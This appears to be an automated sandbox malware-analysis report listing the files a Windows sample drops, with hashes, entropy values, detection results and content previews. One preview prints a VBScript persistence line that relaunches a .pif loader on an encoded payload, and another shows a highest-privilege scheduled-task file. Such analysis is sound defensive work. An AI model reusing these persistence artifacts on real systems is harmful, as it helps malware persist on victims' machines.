            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):45152
            Entropy (8bit):6.149629800481177
            Encrypted:false
            SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
            MD5:2867A3817C9245F7CF518524DFD18F28
            SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
            SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
            SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
            Malicious:false
            Antivirus:
            • Antivirus: Metadefender, Detection: 0%, Browse
            • Antivirus: ReversingLabs, Detection: 0%
            Reputation:unknown
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
            Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):142
            Entropy (8bit):5.090621108356562
            Encrypted:false
            SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
            MD5:8C0458BB9EA02D50565175E38D577E35
            SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
            SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
            SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
            Malicious:false
            Reputation:unknown
            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
            Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):142
            Entropy (8bit):5.090621108356562
            Encrypted:false
            SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
            MD5:8C0458BB9EA02D50565175E38D577E35
            SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
            SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
            SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
            Malicious:false
            Reputation:unknown
            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
            C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            Process:C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif
            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):45152
            Entropy (8bit):6.149629800481177
            Encrypted:false
            SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
            MD5:2867A3817C9245F7CF518524DFD18F28
            SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
            SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
            SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
            Malicious:true
            Antivirus:
            • Antivirus: Metadefender, Detection: 0%, Browse
            • Antivirus: ReversingLabs, Detection: 0%
            Reputation:unknown
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
            C:\Users\user\AppData\Local\Temp\tmp8F04.tmp
            Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1308
            Entropy (8bit):5.107159514403738
            Encrypted:false
            SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0akxtn:cbk4oL600QydbQxIYODOLedq3Bkj
            MD5:211C08A48B92E556A855FB90EE4B0942
            SHA1:4E3ECFBEA0CCA0EE2743C0E23ED3FC79EB2E282A
            SHA-256:21F529F720EE77AD03AFD3CFA4CE04EBAF243C3E752F14C268529665CA936146
            SHA-512:B65C55C05249DFFFD0B52DF66DBA692CE21B6D447DEA43E93DACE718E40ABAC069A6BD2DC4CF0BC3F979A327BB7896BE6A3A36540916A33E0CDA8B974E2955F1
            Malicious:true
            Reputation:unknown
            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
            C:\Users\user\AppData\Local\Temp\tmp94A3.tmp
            Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1310
            Entropy (8bit):5.109425792877704
            Encrypted:false
            SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
            MD5:5C2F41CFC6F988C859DA7D727AC2B62A
            SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
            SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
            SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
            Malicious:false
            Reputation:unknown
            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
            C:\Users\user\AppData\Roaming\98025414\Update.vbs
            Process:C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif
            File Type:ASCII text, with very long lines, with no line terminators
            Category:modified
            Size (bytes):556
            Entropy (8bit):5.3119498211809475
            Encrypted:false
            SSDEEP:12:+R/vdHKmIHKEy4/vdHKmIHKEy4/vdHKmIHKEy4/vdHKmIHKEi:+R/4EEB/4EEB/4EEB/4EEi
            MD5:7C6769F8DEA687E698E0E84E195F6E06
            SHA1:478CBA334C07493F5D68AF8FF6BC7AFA68159178
            SHA-256:DCBB3D6D5B7937BD42F6030F54ACA188A2D9190D529F69A0745B66A46AF99151
            SHA-512:A594B79392A9F8DF2BBBD5390012DF29FC357E31DBECB100D6E55CA6A23C3A59AA6C7E4B793374C38E6BCC651DD3696EA30E0F5AD50CEDAC4460307A6C319CBA
            Malicious:true
            Reputation:unknown
            Preview: CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije"CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije"CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije"CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije"
            C:\Users\user\AppData\Roaming\98025414\bflqi.xls
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):527
            Entropy (8bit):5.4581934236982255
            Encrypted:false
            SSDEEP:12:SGaK3cHsPchSllqdGJuaCx3La0ycUDTg1wstW8RKWd2nRcvyfe:cU6sEImoJuT8zetW84Wdyeie
            MD5:BB7B044C1869889E106DCCB7565B8A79
            SHA1:3F53639B4C01B9F0CCB939E84F2ACDD8806CAF8B
            SHA-256:26765B3A200C88B51579C1117DCBC7A590C9786510080A2347BDC3996F7CE006
            SHA-512:7EBBB130B0BD459F08F33380AA1071B5C0F1B8562AE640271EC33301E80EC575886258932EAB08A23C5DA0FFFB53910318576066C0E068093B0123B5CF95A61F
            Malicious:false
            Reputation:unknown
            Preview: Z2vs5Ug368bTu39207m350VS2O6pmT2nIs2MGo1978AW7A76fk712U239197U2099d89v25clB2y7p16v2PP3J7078V10Kwj5s04IX76Ugi9kD4c2759Hm4S83c78R3v251Y7Q177Ij72Qqe43..opC7A7379k818pO80r46TsHI0W93xe304HyX89VUH031xO5U7t0t6I0F6lO982k584j84Z4M359Fs6bK4YbSa1s9m629NAuy8P2l631xrZ60C10345REH4u2154..R003vD..QiXxy6r42svB64fP2H78cub5w4TeSM53ViU895737J8917ee8Miu90zxbc06K1y403JPs8i35ZZ0p7378K8a76s419E92PPXH2H47PP321948..606vpEl2swF6va3MU198Lh6e8DYw1vB6o1ei0344518SO5O69n077w2LFU9Fa4KQ3Li0Wf3610K06upT5v44..H06U..b439ozR7JzjlhnLILipVbS6uaw5Q337L9fd24l74d..
            C:\Users\user\AppData\Roaming\98025414\blqfwrfoe.xml
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):554
            Entropy (8bit):5.4555675690576315
            Encrypted:false
            SSDEEP:12:fB3qwHA1TFFN4rS9QrFfOP2r9BVX4AAceC4mWVI6NmWDWy87:JNA1nOG9wFcQBXTe5mWa4S7
            MD5:C7E2B6FDB655F30530C26D2C2EDBF84B
            SHA1:BCB902E52BD04D58FC562C90E6AACDAA0A7610BA
            SHA-256:D8A2F1D6A56838F7E83E4CB382D3B3F7A33AAB415E23E4AE5B8603B1346E0BCD
            SHA-512:CC0484A163A4698B96AD7F397E37A8661CD853A3C32B56C75D4D7040C9A4DC27DDCCAC3BDB06B92CA0B6AEB1CE33A34044D18C7C396977E11ECCD16E4E3748FA
            Malicious:false
            Reputation:unknown
            Preview: Z0935C13S2e9FxXSo8YkCsT7G8uIU9001OraNEg06JWF2Ic3z666T83R2522C537h45q15278c8yptw85T668U661zsdg886k9f5G0I8FzCLZ7Q05N0t47Q6190Pe2NjlV6O4m01kKVH0ruJ49Uk77850K8Y1yzE9Fo9u46w399O7Y94m54988..O0Q989hN66ahTLmTsu74Ce35RZ387f5pOWJW4i3a191240swt..17Sf32ATh135..185r2945486944590l7K..Hq1qYr302z5c14369C7f6pN..3U24d99wt8q1D8pNHI12C0TPi5..3oI3l4Vq00i6C2O1756iyY0Izj8637oN4um5LrFXV512u2BM99Bu14v..5HBLD5167903xHK6xi410D0aNOpM698a288818lfx6y02e0Q98FA80w2826Q82D7C8721954w231rg6368o88303SI6zYz1nKBwUp5CDWp..Id531qzp00f3GmhOejU8D2i7u8GIH2Qhi2SY61Y6xgk75uh98MSkS8QL96Bw99D..
            C:\Users\user\AppData\Roaming\98025414\brlfpdix.pdf
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):608
            Entropy (8bit):5.463531236483358
            Encrypted:false
            SSDEEP:12:zlklMEv/lEh29bNm/A72vvGr30woQpSoLwaM5D7yoH75VSVmB84B/1cJRgY+R:5KMOdEhahmbiEwo1oEa4Oob54UltcJny
            MD5:66459F672BB19399A82836CEC9189482
            SHA1:7F08BA22A59C1FD19E0579505CF9016DD1A8AC62
            SHA-256:8F7C37DF3613E2F87AD7A1478C3C7FACDD058A19283C87E40F065A7F830ED8DD
            SHA-512:8B097C70D159D6D8514DB803227C9D2F34752C1C5A86B5563FF210D6E8E05D4FC4B99F7F6CCA0509394E2E1862C83E6F7F0A018D33226D7E4962F9D6A0DD6CBB
            Malicious:false
            Reputation:unknown
            Preview: l09eQ22e4w0HFc26yw13Gs11D209j84C81k9AN8zBUS4J38l8U6l903T0385i3BwM713J12T03Bs25XE1a99faANR84eT2iy3V53tx18OU6924nYpGfx43v..CN27u40Ta757RY2690B..8Mn65m1pSkz6UAWhW8iZ501Y881478vu7PcFGz7RIr244jl236F96G0E44K2vAT8Uy7K7Eb48D7R5G6NQvbhn4b4M45VSn6ho6v95z9zoFf55n341RzX0..b44A44W99k75744090B08851ci9VTKB3NpJRz..77Aj12XvpM3350V61017264eRS4dykKp2JZA2VyZv7D1P2xV..X1Wizblp06..5J2CZD706570L99HBiiY385v19568Ps..96Y621zW911Y6115cQ4y22b29x9dy3298Gl4420631E0Ch54bN1042k1oi70X43Lvthi3TaR38lL6454N69I75tcr139..768410VK7701MuYs9Sc09MMt0c91S566kt6hS5fmXnOpcs4S0mc69d3ekedeUb6B918SmKM40v757154166QJ713g2474535H1Y50HhxDIz3u32d801M9..
            C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):777456
            Entropy (8bit):6.353934532007735
            Encrypted:false
            SSDEEP:12288:aBzZm7d9AZAYJVB7ii/XAvKxRJBnwvogSJ4M4G4akiP5DGDt2:0cneJVBvXAvwRJdwvZ5akiP5DGR2
            MD5:8E699954F6B5D64683412CC560938507
            SHA1:8CA6708B0F158EACCE3AC28B23C23ED42C168C29
            SHA-256:C9A2399CC1CE6F71DB9DA2F16E6C025BF6CB0F4345B427F21449CF927D627A40
            SHA-512:13035106149C8D336189B4A6BDAF25E10AC0B027BAEA963B3EC66A815A572426B2E9485258447CF1362802A0F03A2AA257B276057590663161D9D55D5B737B02
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 32%
            Reputation:unknown
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O.........."..................d....... ....@..........................0............@...@.......@.........................T................................c................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc................R..............@..@.reloc...u.......v...H..............@..B................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Roaming\98025414\busn.exe
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):539
            Entropy (8bit):5.425509258170051
            Encrypted:false
            SSDEEP:12:P6PegCZnTYJE/odBmRQjZefXoNSmwS9Nx9KMf948kBStsh:P4GZQnjZqoR9zYMVeh
            MD5:6D176D6A6F1603BD9AD991DD89E63973
            SHA1:8E36ABB26A0D08950FE840296A486BF6E134FED9
            SHA-256:C556539176F1992F60A16ECABBD6DB2CBDF6CCA450C5DD572F50F0F71AC6D965
            SHA-512:E40D27789F3AE814B2193DED6E6CAABAF1A86575660FEE4048C318572D77966B74EFC93A551268E2433145AFB4F9F42167BCC2C2A79BFFC91169BCC1A8FAEF80
            Malicious:false
            Reputation:unknown
            Preview: 87P0y2u7C29M3V5165651J212Wnc0P66d50427k53wBoZ892T72r439vYi8Yn1G2v3K2N57f415cZL0X0ya17nz18F3LmeUl..C5251Z5013H58r9680..4nu97J49sZ423t6tg0p25Chyap6awiK7qHMZ5l01Vl8D3Jf99870SCZ1B13lZklTGrB4563113yj5T5300T84T55U98959440ePk..0rqV9854ws622jY15T3A8BV18p70yt4p1bq554CA4rq195M7Q6822n5SU7UD2711K3U09190J7CU8622lw1s1ujw27fce0B2Tq535j3B90p4703tbl3U7tY5Y959Z4I498wdqGaDO3de1ZU5..UHw47k8It404I6Tx0e5t2wMN68m0raPk2oU668o3Z7Q228H1Ij2ZA82cOR2h1Kk2N9nHE0G2NQ6Oz46iZ5q3H1821PsgFZ94xi9..20561R62wLGq5rR031Xz826736N4oFyX6573h8b5ae9qU34Rf2X09x22hmT7lylL90wH7Y..
            C:\Users\user\AppData\Roaming\98025414\ckrnnsvtob.ppt
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):612
            Entropy (8bit):5.447687369660329
            Encrypted:false
            SSDEEP:12:j4na1Wnf8+dCjctDznzfFZR87oA3N0PZfdVcLuGgrHXImpC:jfcnf8+dCgtDHNZex3mPZfdquNYmk
            MD5:C81632CBA7BAFBF7F39779E2EE21C702
            SHA1:97DBBF0044C476A4CC1FE50438A235CBBC0D714B
            SHA-256:8FA5B087D394BC6BC9AF27DFF9396963F3A195BFFB132272D1B4875F848427C2
            SHA-512:93D78B9101005E0E460839FA9546EC4DB50409D32B1516E747012F19489B8F9E158A485A9E9B1D2E59D1FD580AE590665A815D18BFB6B73BE38AE05DCC773196
            Malicious:false
            Reputation:unknown
            Preview: 3Qlqj10tD0138W4OP57RM9r09L6fp66M694qjEF09M685h5518Nh5w02467H41QU14AnF45711q09y9855E8SK0b505f..42jULc5wl5l43wS163u6548C4er625fozFk28Ll8m0NmbE0t5fw515Y59C514b3u7Wy924YZ65ul790769ZA0I9664w27u114BXyvVUyAnY5x..G16ST8rs9JIp47T52X99KJL04n9v1c603eSV41rVeUze836f6i8Z371AC4o4R293F4096NuQjW32M659KWJW0h9PTWUbSa0O2XV..50I1NYE1904s62j4MPPrp6Y9zo95jY9V70Vy7328650BvT3oG0t1O61qv7e5kF2UE8Y69Uk64K8..88K8S5t7L856pLDI4099g6363g9r5YN0F03T61P72F59WdNvc539Ce10O3WxP2673x20189dJdxGuO1Qk..AW9AWok02Fp3FIb06gH5022U0S65bu8nIo4fXYA6U5a7750s60oK3GQcx484I6DEP959963m825754m9077u8Z70M3YZ590Ri1g43U599i7QNxll1K3W175N1JJ70O7m22r6CW1h15662S8y..
            C:\Users\user\AppData\Roaming\98025414\csmggk.xls
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):564
            Entropy (8bit):5.520444876236276
            Encrypted:false
            SSDEEP:12:GeetdQLf3qr2jDzG0dNaYahIXZzc/a6M7YVu+LZq:GOWGDzGcQ/hIXZzc/a684u0Zq
            MD5:4638BA44BC318D643950700C106EC3F4
            SHA1:029AE95014C50F9C719238FDF6023B5F154F2697
            SHA-256:319C18E5DCDE9660C5E8DE43361E0ADC7B69893390F4FFB62E651F7542341C63
            SHA-512:C51B81BBE87BC1EE66D577E43BCFB90F55A8610373D3BF1EBF131DF8A52E5D57259C56B42F9B14F976A136527C137DDFE1D613951E8D6AF028FD18640C7786D5
            Malicious:false
            Reputation:unknown
            Preview: 03231T8..5KyXClC4A1f2y1626..g9n73EomHy12jy8c4Bq8At6n27110dEs9LhtOG1v454p02721938Ew4559o6CV08R0u5NJ127nSnz3C62bT0XAmFlI43MCh56jl69ROY04x82RR98608589Y74b1M3v985Yf70xu1r4a9T89i68Yrs3BFy..B17VBO9D10nWE4OO220whYO705G97359Cf77NZuUFp8d5JGf3R7AlQ83k9e6Sw7Fe46x1dt6PH2nVkVLQNK777lcRR1tFg6k0R6Uhj0JL0609FIP3e5xDrnR1N9368Y0ZEl347713b8ks42o98..w7FAkk08sj396OyC159JMdAm0370kj5d9ka03764x4ST..V0T4227L8k7S6..r8Oa64DmG92I87aqG7N2I3gpM6S2B9b106AU10q2129phi573Tz94b9rH7O536NJ8S4sF62444uTH1G8586g7IrQ060YT0aRz70M48X1H8f9681AtntL7q19HVyx5LjQLN21y2Mox716z2n0g77Oh55RA54Q3v8z9hh2622Z7..
            C:\Users\user\AppData\Roaming\98025414\ctifihmq.xml
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):527
            Entropy (8bit):5.474619117448956
            Encrypted:false
            SSDEEP:12:P6iG6mBbUy9I1vv11i77MNH3JRVRYttyHYZRX2oyp5Lo2MwZ0:P6J5Uy9I1v907MN5RVRYby4PupenwZ0
            MD5:9942C89348AE4E9E2B8E2AF6FCA87877
            SHA1:3034AED7F77A1CF65D3BE80AD3CD027BB45C2E3C
            SHA-256:5C43BFFCA850084A560A387DE5B9CEABFBCE925885CC2B4D862F1CF11B486009
            SHA-512:232B73D9BA7D2AEA9E40B3B4748FDE5F7CD72BF18FDACE72DF97C95F179F1682D531A957EBD7A026FC4033887312CD039D09C604EB28E644B9376E75282956B0
            Malicious:false
            Reputation:unknown
            Preview: 68hoS4b7CAM3gj68006r490n54UmSO4B52eBh4Ym6qy8605i2241Y906HV4LJ0H5p0768E5N18F6bT2618m2S72420xQdK1qG1d067LX1pqY748XZxr56AR57ZP28pZ6..9m238r48d1T0D0863fu4e152856aC3R930v..44150t7z80xs4t88XHw899Fv31705rvVJC74jC8r08yL79330w3cN1A987DsE746..AewA7S7W6J188XV9J49D..BFGY9666LEAg5k6I7lvC45w3M14B..12ypq93LCYOE7b2273841J7u8yFQ28Ib6w4bGuM9bB5Hw67KSJ98775k2lXwRc91Op24hb76q4k7Sc8173paE2SgKAe1V0OMhG5g960AbJ75I..A6537PCoJMu55YNG2P24E19Kat1o03l0q60U65752a4780Zq9vO95F44I6Va98NcgFSi87t41NcMDJ9276QL4y2009..kXAJ79baw1s443r0efs4J3lO12xnil6DU048X..
            C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
            Category:dropped
            Size (bytes):139971984
            Entropy (8bit):7.061995429082689
            Encrypted:false
            SSDEEP:98304:6l5lllNlqlglulhlhl+lJlhlTlOl+l4lCl2l1l4lclDlXlql1l/lLl4lhlklJluq:i
            MD5:88A7B78373EEDC7C838AB5ADE9628B9D
            SHA1:122A17B6E6E9FD2EEB875CABBE673A0886BA67BE
            SHA-256:B10B2A020300A668E155CAAAB629532793C4D0FEBE401B4B71B05025DFFC2C1E
            SHA-512:96D3C826353048F3F32AB9646A227E6E9B27EE879FF963587CB8D50C25423EEA2E9AA8B824C642E08F7B6886856E7E858D81392D116838E0E675FE8ABC941BC6
            Malicious:false
            Reputation:unknown
            Preview: ..;.n.;...j......2S*!..[.si........}......YEJ.....zw..r3=..\A.."....Yw<.Z..$......h`..;.K...G.=.....#.c.s....'J..q.....D.@hPm.....9.O.3.T.e.2.5.F.3.3.9.0.J.5.j.y.s.1.3.T.l.S.4.l.7.f.0.9.Y.u.o.8......C.o.!d.._nK.-.zW......tX.b2..w., ...?.!.@`....c.QlZv..}.u4.....qf....P.W..)}.:.(."8..hEQ....H=..9..q>".@..A......I.7.t.2.1.4.0.3.9.C.f.3.N.2.7.0.O.9.8.8.6.j.5.c.Y.......>.v.b]i...A\.'4y.M_......<.......9...B^...V...........W..\&........U...2c~.qFY.\...E...}..4..}.U&....`.32D......%.Y>...:.bWs...7...i..Km..Y.h..L0..f....Q.7.6.3.2.0.X.n.4.4.w.y.9.R.5.O.9.5.t.g.w.n.5.g.n.1.z.V.7.7.G.3.s.A.R.3.M.9.z.5.2.Y......(G..5A'....H.p..#..QE.\l.I?.....N.?.*h...r.]:...<.[....nj..@.J...;D7.....z.......a....u?.N.#p,.Y.....r.=......jg.}(...e..0{.e.H..6r.@LP..TLD.~...!.X..i.Q.....9.6.3.6.P.U.5.X.8.z.0.1.G.1.h.U.r.H.r.Z.9.g.z.8.3.....x.8.R.J.3.6.0.b.b.Y.F.3.g.M.E.D.0.3.k.3.3.2.I.7.M.2.Z.v.....f.8.4.8.Q.m.I.B.3.S.Y.I.P.Q.F.7.6.C.5.5.h.8.8.L.6.0.6.X.8.r.8.2.U.4.L.Z.9.r.m.N.9.7.2.Y...
            C:\Users\user\AppData\Roaming\98025414\febjvuw.dat
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):544
            Entropy (8bit):5.592971064447333
            Encrypted:false
            SSDEEP:
            MD5:8C28CAE7D76A0E9BA170B1D8A07CB3A2
            SHA1:33DF8C30A51652F6F1A3F8D0F7F31DED7D5AC4DF
            SHA-256:5DA6F6FA8CAC485E57FB44DA5F118B591F11911C2C2155255D7D16A23D9A8507
            SHA-512:00C2E88A73D5FCA0D8997200160DE7E73195CB3D8EB9D81638968EEB7D7C3E28D854A77A92723E70BC8DD6D84A083B005AA9D6903CA2EBED9D2DA538AECA1DC3
            Malicious:false
            Reputation:unknown
            Preview: 8Q3X227q2657f721b1x0c1Nctbl2wD8101VU1i7yaCnB8fX842905YkkUG8HjG56Uhh16j6817W4T9d9R7Z31g2FBUtA9r..49ig826B4CQ4o80437Z086067H1B9I8D996fBo0M610..9p9yaGoq359bBLi6sekeT4Fk4s3FUT55x7zp1dWzQd22t5OJu5A84136DCQ2KQx4Me7218yEw8qw7D5WD57K9Kv6D1t0f75JW1z972v..5569A508JZGLYj3y2zw16s312Oegt47o818n212b81782O13oV09iLq63zhh9zM2J47FV679836v997RG104eK70mcj..iN87X3DH0..0va2qNWG865Eu7Pr5rYdnQf4Z9Q6S6ZxR0TeTL44X03629RN2yhwz43G6x0Y4425..oe6Sokn36pV0nz0567..0zg3B60d2oKD2I88OcfO9AvE5SY06Wy0e3..888tpptSJXx4fNhTHma1Av1Yc7l0R794i872e94w80Eehne9dk3QIDJbgB1rnf3X72rPPa..
            C:\Users\user\AppData\Roaming\98025414\hdokdhg.xls
            Process:C:\Users\user\Desktop\ameHrrFwNp.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):553
            Entropy (8bit):5.43819133165135
            Encrypted:false
            SSDEEP:
            MD5:F854254AE5B91A5EE6860E6606E4ABDD
            SHA1:3AD12991CF1063EA3FBBE52DE491A22F533F454C
            SHA-256:887EFCC748AE6203142D47A31680FEBA0BA35837F57B2278C467169DFAED7201
            SHA-512:21FF7D5710C27905DCFF1BB49006469F80A52E604A32F01B38AA1933FDD4A6B6974ED1C7F66A319761F8AC2BE06B9C20FE32ECD077B693BACB83BD5E3E1B0575
            Malicious:false
            Reputation:unknown
